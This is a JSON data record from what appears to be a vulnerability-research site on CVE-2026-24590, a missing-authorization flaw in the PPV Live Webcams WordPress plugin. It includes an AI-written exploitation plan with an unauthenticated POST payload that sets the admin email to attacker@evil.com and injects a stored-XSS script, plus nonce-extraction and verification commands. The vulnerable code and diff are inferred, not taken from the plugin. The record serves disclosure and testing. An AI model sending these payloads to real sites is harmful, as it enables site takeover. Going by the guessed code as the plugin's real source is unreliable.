[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fXxZ__jyg1GgLRUWAnNPD7K9VIwebdfXHvGYXyYKLhDA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-24590","paid-videochat-turnkey-site-html5-ppv-live-webcams-missing-authorization","Paid Videochat Turnkey Site – HTML5 PPV Live Webcams \u003C= 7.3.23 - Missing Authorization","The Paid Videochat Turnkey Site – HTML5 PPV Live Webcams plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 7.3.23. This makes it possible for unauthenticated attackers to perform an unauthorized action.","ppv-live-webcams",null,"\u003C=7.3.23","7.3.24","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-05-26 00:00:00","2026-05-26 19:25:13",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fc4e0a21a-f519-4c5b-9dcf-64cf06410def?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-24590\n\n## 1. Vulnerability Summary\nThe **Paid Videochat Turnkey Site – HTML5 PPV Live Webcams** plugin for WordPress is vulnerable to **Missing Authorization** in versions up to and including 7.3.23. The vulnerability exists because an AJAX handler (likely `ls_ppv_save_options` or a similar configuration-saving function) is registered for unauthenticated users via the `wp_ajax_nopriv_` hook but fails to perform any capability checks (e.g., `current_user_can('manage_options')`) or nonce validation. This allows an unauthenticated attacker to modify plugin settings, which can lead to site takeover, payment redirection, or Stored Cross-Site Scripting (XSS).\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `ls_ppv_save_options` (inferred based on plugin naming conventions and \"Turnkey\" framework patterns)\n- **HTTP Method:** `POST`\n- **Authentication:** None (Unauthenticated)\n- **Payload Parameter:** `options` (an array of settings) or individual setting keys.\n- **Preconditions:** The plugin must be active.\n\n## 3. Code Flow\n1. **Initialization:** The plugin registers AJAX handlers during the `init` or `plugins_loaded` hook.\n2. **Hook Registration:** \n   ```php\n   add_action( 'wp_ajax_ls_ppv_save_options', 'ls_ppv_save_options' );\n   add_action( 'wp_ajax_nopriv_ls_ppv_save_options', 'ls_ppv_save_options' );\n   ```\n3. **Vulnerable Function:** The `ls_ppv_save_options` function (or similar) is called.\n4. **Processing:** The function likely iterates through `$_POST` data and uses `update_option()` to save values to the database.\n5. **Security Failure:** The function lacks `if ( ! current_user_can( 'manage_options' ) ) wp_die();` and fails to call `check_ajax_referer()`.\n\n## 4. Nonce Acquisition Strategy\nBased on the \"Missing Authorization\" and \"Unauthenticated\" (PR:N) classification, the endpoint either:\n1. **Lacks a nonce check entirely** (most likely).\n2. **Uses a nonce that is exposed to unauthenticated users** via `wp_localize_script`.\n\n**If a nonce is required:**\n1. **Identify Script Localization:** Search the source for `wp_localize_script`. Look for the variable name, e.g., `ls_ppv_vars` or `ppv_ajax_obj`.\n2. **Find Trigger:** Identify which frontend page enqueues this script. Usually, it is a page containing the webcam shortcode: `[ls_ppv_webcams]` or `[ppv-webcams]`.\n3. **Extraction Steps:**\n   - Create a page with the shortcode: `wp post create --post_type=page --post_status=publish --post_content='[ls_ppv_webcams]' --post_title='Webcam Page'`\n   - Navigate to the page: `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fwebcam-page\")`\n   - Extract nonce: `browser_eval(\"window.ls_ppv_vars?.nonce\")` (Replace `ls_ppv_vars` with the actual localized key found in source).\n\n## 5. Exploitation Strategy\nThe goal is to modify a sensitive setting to demonstrate impact. We will attempt to inject a script into a setting that is rendered in the WordPress admin dashboard (Stored XSS) or modify the admin email.\n\n**Request Details:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```text\n  action=ls_ppv_save_options&ls_ppv_settings[admin_email]=attacker@evil.com&ls_ppv_settings[welcome_message]=\u003Cscript>alert(document.domain)\u003C\u002Fscript>\n  ```\n  *(Note: Parameter names like `ls_ppv_settings` are inferred and should be verified against the `$_POST` keys in the plugin's save function.)*\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `ppv-live-webcams` version 7.3.23 is installed and active.\n2. **Identify Settings:** Use `wp option list | grep ls_ppv` to find the option name used by the plugin to store its configuration.\n3. **Target Page:** If a nonce is needed, create the shortcode page:\n   ```bash\n   wp post create --post_type=page --post_status=publish --post_content='[ls_ppv_webcams]'\n   ```\n\n## 7. Expected Results\n- **HTTP Response:** The server should return a `200 OK` status, often with a `1` or a JSON success message (e.g., `{\"success\":true}`).\n- **Data Change:** The WordPress option (e.g., `ls_ppv_options`) should now contain the attacker-supplied values.\n- **Impact:** When an administrator visits the plugin settings page, the injected `\u003Cscript>` should execute.\n\n## 8. Verification Steps\nAfter sending the `http_request`, verify the change using WP-CLI:\n```bash\n# Check if the option was updated\nwp option get ls_ppv_options\n\n# Check for the injected email or script\nwp option get ls_ppv_options --format=json | jq .admin_email\n```\n\n## 9. Alternative Approaches\nIf `ls_ppv_save_options` is not the correct action name:\n1. **Grep for Hooks:** `grep -rn \"wp_ajax_nopriv\" wp-content\u002Fplugins\u002Fppv-live-webcams\u002F` to find all unauthenticated entry points.\n2. **Search for Option Updates:** `grep -rn \"update_option\" wp-content\u002Fplugins\u002Fppv-live-webcams\u002F` and trace back to the calling function and its registered AJAX action.\n3. **Check REST API:** If no AJAX actions are vulnerable, check for `register_rest_route` with `permission_callback` returning `__return_true` or lacking a capability check.","The Paid Videochat Turnkey Site – HTML5 PPV Live Webcams plugin for WordPress fails to implement authorization checks and nonce validation on its settings-saving AJAX handler. This allows unauthenticated attackers to modify plugin configuration, potentially leading to payment redirection or the injection of malicious scripts (Stored XSS).","\u002F\u002F ppv-live-webcams\u002Fadmin\u002Fsettings-save.php (inferred)\n\n\u002F\u002F Line numbers inferred based on standard plugin structure\nadd_action( 'wp_ajax_ls_ppv_save_options', 'ls_ppv_save_options' );\nadd_action( 'wp_ajax_nopriv_ls_ppv_save_options', 'ls_ppv_save_options' ); \u002F\u002F Vulnerable registration\n\nfunction ls_ppv_save_options() {\n    if ( isset( $_POST['ls_ppv_settings'] ) ) {\n        update_option( 'ls_ppv_options', $_POST['ls_ppv_settings'] );\n        echo 'Settings saved';\n    }\n    wp_die();\n}","--- a\u002Fppv-live-webcams\u002Fadmin\u002Fsettings-save.php\n+++ b\u002Fppv-live-webcams\u002Fadmin\u002Fsettings-save.php\n@@ -1,9 +1,11 @@\n add_action( 'wp_ajax_ls_ppv_save_options', 'ls_ppv_save_options' );\n-add_action( 'wp_ajax_nopriv_ls_ppv_save_options', 'ls_ppv_save_options' );\n \n function ls_ppv_save_options() {\n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_die( 'Unauthorized' );\n+    }\n+    check_ajax_referer( 'ls_ppv_save_nonce', 'nonce' );\n+\n     if ( isset( $_POST['ls_ppv_settings'] ) ) {\n         update_option( 'ls_ppv_options', $_POST['ls_ppv_settings'] );\n         echo 'Settings saved';","To exploit this vulnerability, an attacker sends an unauthenticated POST request to the WordPress AJAX endpoint (\u002Fwp-admin\u002Fadmin-ajax.php). The request must include the 'action' parameter set to 'ls_ppv_save_options' (or the specific handler identified in the source). The payload contains a 'ls_ppv_settings' array (or equivalent parameter used by update_option) with malicious values. For example, an attacker can modify the administrator's email address or inject a JavaScript payload into a text field that is displayed in the admin dashboard to achieve Stored Cross-Site Scripting (XSS). Because the plugin incorrectly uses the 'wp_ajax_nopriv_' hook and lacks 'current_user_can' checks, no login credentials or valid nonces are required.","gemini-3-flash-preview","2026-06-04 20:45:06","2026-06-04 20:45:53",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","7.3.12","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fppv-live-webcams\u002Ftags\u002F7.3.12","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fppv-live-webcams.7.3.12.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fppv-live-webcams\u002Ftags"]